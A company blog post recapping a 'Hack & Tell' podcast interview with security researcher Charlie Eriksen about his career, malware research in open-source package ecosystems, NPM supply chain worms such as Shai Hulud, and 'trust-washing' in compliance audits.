From gaming frontlines to supply chain zero-day: A deep dive into software security with Charlie Eriksen

When the foundations of our digital world are built on billions of lines of open-source code, are we doing enough to protect them? And what happens when the very mechanism of compliance becomes a loophole?

Our CEO, Björn, recently sat down with security expert Charlie Eriksen, a Security Researcher at Aikido Security and Founder of JSWZL, on the latest "Hack & Tell" podcast. Their chat began with a trip through Charlie's career, from working security in the gaming world to spotting and breaking down the next huge supply chain worm. They then moved on to discuss security and trust in the world of open source software and the supply chain.

Keep reading for a glimpse into their discussion. Or watch or listen to the full podcast episode, if you prefer.

The wild ride: Lessons from the trenches of gaming security

Charlie's path into the modern security frontier began in an intense environment: gaming. While at CCP Games in Iceland, his responsibilities spanned far beyond typical IT security.

This intensely fast-paced world, where threats were constant and the stakes involved real-world money and geopolitical concerns, laid the foundation for his next moves into offensive security at Syndis and later co-founding the hands-on security training company, Adversary (later acquired by Secure Code Warrior).

In order to build secure software, you have to be able to break it

After leaving Syndis, Charlie was instrumental in founding Adversary, which grew out of a crucial question posed after a major security incident: How do we prevent this from happening again?

Charlie’s answer was unconventional: training, but make it hands-on.

This philosophy reflects a core belief that still drives him today: for you to be able to build things really well, you also need to be able to break them. This principle defines the current work Charlie does at Aikido Security, where his focus has shifted from finding flaws in proprietary systems to identifying malicious code in the building blocks of the modern internet.

Malware vs. vulnerability: Hunting the supply chain threat

Charlie’s current role as a Security Researcher focuses heavily on malware research, particularly within the open-source supply chain. While it shares the "curiosity" of vulnerability research, the objective is different.

• Malware Research: Primarily focuses on analyzing malicious software (threats already in the wild) to understand its behavior, origin, and capabilities, with the goal of automated detection and remediation. For Charlie, this means looking at code all day in ecosystems like NPM, VS Code, and Rust, trying to preemptively identify and block malicious packages.
• Vulnerability Research: Seeks to identify flaws and weaknesses in software and systems (potential threats) before they are exploited, with the goal of proactive patching and defense. This is often the domain of ethical hacking and pentesting.

The sheer volume of new code makes automation critical. He states that Aikido analyzes 50,000 packages a day, filtering the vast majority. However, Charlie stresses that human expertise remains vital for triaging hundreds of flagged packages and refining the automated rules.

A wake-up call for the industry: Shai Hulud and the NPM incidents

The discussion quickly moved on to recent, high-impact incidents that prove the urgency of Charlie’s work, most notably the 2023 compromises within the Node Package Manager (NPM) ecosystem.

• The Big Compromise: An incident that compromised multiple major packages, potentially allowing attackers to infect vast swathes of cloud environments. As Charlie noted, the industry was "really lucky" that the attackers were unsophisticated and simply trying to steal crypto.
• The Shai Hulud Incident: Described as a "wake-up call," this attack featured worming behavior—the ability to automatically spread—through compromised packages.

Since this episode was recorded, Shai Hulud struck again. Read more about the incident in Charlie’s own words here.

These events highlight the fragile balance between trust in open-source ecosystems and the potential for widespread vulnerabilities. The threat model has changed: attackers aren't just targeting the production server. They are targeting the developer’s machine to steal credentials and inject malicious code into the supply chain.

The added challenge of trust-washing

Perhaps the most challenging concept raised in the discussion was "trust-washing" in open-source software, which reveals a critical flaw in how we approach security and compliance today.

But first…

What is trust-washing?

Charlie points out that open-source components are often ignored during detailed security scrutiny applied to in-house code during compliance audits.

Since the foundation of virtually every application is built on code the company doesn't own, code with no ability to look into the security practices of its maintainer, auditors are forced to ignore it. This creates a dangerous paradox:

• The problem: The deepest, most complex parts of the application are effectively exempted from the security stamp of approval.
• The result: A false sense of security where compliance is achieved simply by outsourcing the risk to an un-auditable third-party (the open-source maintainer).

Charlie argues that this challenge is not just an internal problem for companies, but a systemic failure of the ecosystem itself to self-regulate.

A look ahead: What business leaders must do

Given the shifting threat landscape, the rise of AI-assisted development, and the fragility of the supply chain, the discussion concluded with advice for business leaders on navigating this new reality.

1. Embrace continuous security

Cybersecurity is not a project. It is a continuous, evolving process, and a permanent line item on the profit and loss statement.

Business leaders must move past the idea of achieving a "terminal state" of security. Instead, they must foster a culture of continuous improvement, risk-minimization, and rapid response.

2. Implement guardrails, not just training

While awareness training is important, it is not the sole solution. With AI accelerating development, real-time feedback and guardrails are essential.

3. Cultivate humility and slow down

Ultimately, Charlie believes that even the most senior, technical employees need a dose of self-awareness.

In a world driven by instant gratification and the pressure to ship fast, the best advice for security is to slow down and hold ourselves accountable for the code we produce. Good things take time. In security, skipping the final 20% of effort is what leads to catastrophic breaches.

Offense is the best defense

Concluding the conversation on the future of security, Charlie emphasized the need for adaptability and the belief that offense is the best defense.

The investment in security research and defense is paramount, and every company must recognize it is a new "border" subject to attack. Securing the future means questioning existing norms, balancing the speed of innovation with caution, and fostering a culture where security is fundamentally interwoven with development and management—a lesson that is being written in blood across the digital world.

This article is based on a podcast episode with Charlie Eriksen from the "Hack and Tell" podcast series.

Watch the full episode on YouTube:

Or listen on Spotify.